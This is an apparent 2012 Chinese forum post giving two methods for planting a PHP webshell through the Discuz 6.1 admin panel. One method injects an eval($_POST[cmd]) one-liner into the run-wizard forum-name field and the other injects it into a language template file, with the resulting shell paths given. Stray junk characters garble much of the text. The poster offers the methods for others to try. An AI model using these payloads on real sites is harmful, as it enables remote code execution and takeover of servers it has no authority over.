discuz6.1两种方法后台拿shell
" @3 o. ~; N# _! [% c3 g* ^2 P好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
3 b- L' n1 d3 e, s. l" E1:. R. H; J& D' h; ?
http://127.0.0.1/discuz/admincp. ... zard&frames=yes% G: @6 G* {. \. o, v( x
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell/ V, M8 K- [$ K4 F6 J
<?php eval($_POST[cmd]);?>
; |' J, v: ?. ?后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
4 e/ k( x, x) b* T% l
: {6 ^3 d" J$ e' f9 t+ h
4 _- V# L. T- \+ r# R6 H1 K2:后台模板管理--默认模板套系--详情6 ]! [5 n5 W$ j# Q2 ~: S: W$ D0 r
templates/default/actions.lang.php
9 s0 C4 L. A# ?& e3 sjhackj\\');eval($_POST[cmd])?>;//
, j" F, ]& l/ I8 _& {) C
( _/ P, P/ r9 x0 V% ^利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对